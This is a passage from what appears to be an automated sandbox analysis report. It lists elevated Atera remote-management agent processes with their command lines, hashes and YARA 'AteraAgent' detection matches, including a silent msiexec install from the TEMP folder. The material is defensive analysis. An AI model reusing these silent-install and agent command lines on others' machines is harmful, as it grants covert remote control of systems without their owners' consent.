                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2040710352.000002E723280000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2040710352.000002E7232BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2142200483.000002E723480000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2144565646.000002E723C01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:50
                                                                                                                                                                                                                                        Start time:11:20:24
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:51
                                                                                                                                                                                                                                        Start time:11:20:25
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "10a783e3-c632-4a9e-aced-d9359a7beffe" agent-api.atera.com/Production 443 or8ixLi90Mf "maintain" 001Q300000MHGA9IAP
                                                                                                                                                                                                                                        Imagebase:0x24844c30000
                                                                                                                                                                                                                                        File size:33'328 bytes
                                                                                                                                                                                                                                        MD5 hash:B39264220D20A5C2807CDA3EA5F6B772
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2561414784.0000024844E21000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2571688057.00000248459CC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2571688057.000002484595F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2567716195.0000024845510000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2567179380.00000248450C0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2561414784.0000024844DEC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000000.1978260272.0000024844C32000.00000002.00000001.01000000.0000002A.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2571688057.000002484567F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2571688057.000002484569A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2567716195.0000024845571000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2557866082.000000C469EF0000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2561414784.0000024844DE0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2566768207.00000248450A2000.00000002.00000001.01000000.00000047.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2561414784.0000024844E6E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2566346650.0000024845082000.00000002.00000001.01000000.00000046.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000033.00000002.2571688057.0000024845621000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:52
                                                                                                                                                                                                                                        Start time:11:20:25
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:53
                                                                                                                                                                                                                                        Start time:11:20:25
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "83c4b87a-e204-4da6-bcee-e7b8e82431d2" agent-api.atera.com/Production 443 or8ixLi90Mf "syncinstalledapps" 001Q300000MHGA9IAP
                                                                                                                                                                                                                                        Imagebase:0x2139a630000
                                                                                                                                                                                                                                        File size:55'856 bytes
                                                                                                                                                                                                                                        MD5 hash:E32856BEF4126DF5FB008E0EC9E7A3DD
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000035.00000002.2257779174.00000213B387D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000035.00000002.2143874595.000002139B71F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000035.00000002.2143874595.000002139B31D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000035.00000002.2143874595.000002139B543000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000035.00000002.2140746308.000002139AA70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000035.00000002.2143874595.000002139B30B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000035.00000002.2133420336.000002139A8A9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000035.00000002.2133420336.000002139A860000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000035.00000002.2133420336.000002139A8E5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000035.00000002.2252108039.00000213B37B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000035.00000002.2143874595.000002139B470000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000035.00000002.2143874595.000002139B343000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000035.00000002.2133420336.000002139A87A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000035.00000002.2143874595.000002139B602000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000035.00000002.2143874595.000002139B456000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000035.00000002.2270718409.00000213B3AF3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000035.00000002.2133420336.000002139A868000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000035.00000002.2143874595.000002139B335000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000035.00000002.2257779174.00000213B382A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000035.00000002.2143874595.000002139B5D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000035.00000000.1980617476.000002139A632000.00000002.00000001.01000000.0000002B.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000035.00000002.2133420336.000002139A89B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000035.00000002.2143874595.000002139B0F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000035.00000002.2143874595.000002139B4ED000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000035.00000002.2143874595.000002139B43D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000035.00000002.2133420336.000002139A941000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000035.00000002.2270718409.00000213B3AB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000035.00000002.2143874595.000002139B72D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:54
                                                                                                                                                                                                                                        Start time:11:20:25
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:55
                                                                                                                                                                                                                                        Start time:11:20:27
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "66f79428-b794-442f-982d-2e0a02b56009" agent-api.atera.com/Production 443 or8ixLi90Mf "pollAll" 001Q300000MHGA9IAP
                                                                                                                                                                                                                                        Imagebase:0x1cc122b0000
                                                                                                                                                                                                                                        File size:219'696 bytes
                                                                                                                                                                                                                                        MD5 hash:01807774F043028EC29982A62FA75941
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000037.00000002.2103371672.000001CC12F4A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000037.00000002.2103371672.000001CC12F4E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000037.00000002.2079198013.000001CC124CC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000037.00000002.2103371672.000001CC12D3E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000037.00000002.2103371672.000001CC12F56000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000037.00000002.2079198013.000001CC12508000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000037.00000002.2103371672.000001CC12F5B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000037.00000002.2103371672.000001CC12F4C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000037.00000002.2103371672.000001CC12D21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000037.00000002.2103371672.000001CC12E92000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000037.00000002.2097548512.000001CC12630000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000037.00000002.2079198013.000001CC12501000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000037.00000002.2120854347.000001CC2B3E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000037.00000002.2120854347.000001CC2B48B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000037.00000002.2120854347.000001CC2B454000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000037.00000002.2103371672.000001CC12F5D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000037.00000000.1996426946.000001CC122B2000.00000002.00000001.01000000.0000002C.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000037.00000002.2103371672.000001CC12F48000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000037.00000002.2079198013.000001CC1254D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000037.00000002.2103371672.000001CC12F51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000037.00000002.2103371672.000001CC12D40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000037.00000002.2079198013.000001CC124C0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:56
                                                                                                                                                                                                                                        Start time:11:20:27
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:57
                                                                                                                                                                                                                                        Start time:11:20:27
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"msiexec.exe" /i C:\Windows\TEMP\ateraAgentSetup64_1_8_7_2.msi /lv* AteraSetupLog.txt /qn /norestart
                                                                                                                                                                                                                                        Imagebase:0x7ff65d820000
                                                                                                                                                                                                                                        File size:69'632 bytes
                                                                                                                                                                                                                                        MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000003.2211678860.000001DCFD93F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000002.2260851037.000001DCFCEA0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000003.2259674070.000001DCFCE8B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000003.2199718166.000001DCFD870000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000003.2259779386.000001DCFCE9F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000003.2110342864.000001DCFD93F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000002.2261344785.000001DCFD93F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:58
                                                                                                                                                                                                                                        Start time:11:20:28
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "487fa34b-77da-4f1b-8f72-efcd0c681b03" agent-api.atera.com/Production 443 or8ixLi90Mf "agentprovision" 001Q300000MHGA9IAP
                                                                                                                                                                                                                                        Imagebase:0x165977f0000
                                                                                                                                                                                                                                        File size:37'936 bytes
                                                                                                                                                                                                                                        MD5 hash:EFB4712C8713CB05EB7FE7D87A83A55A
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003A.00000002.2107478739.0000016597960000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003A.00000002.2134700713.00000165B0970000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003A.00000002.2134241384.00000165B08F2000.00000002.00000001.01000000.00000036.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003A.00000002.2107478739.00000165979AC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003A.00000002.2134700713.00000165B09C9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003A.00000002.2107478739.0000016597964000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003A.00000002.2116373812.0000016598360000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003A.00000002.2116373812.00000165981E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003A.00000002.2116373812.0000016598488000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003A.00000002.2115523324.0000016597C40000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003A.00000002.2107478739.000001659792C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003A.00000002.2116373812.00000165983D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003A.00000002.2107478739.0000016597920000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003A.00000002.2115830756.0000016597FE2000.00000002.00000001.01000000.00000031.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:59
                                                                                                                                                                                                                                        Start time:11:20:28
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
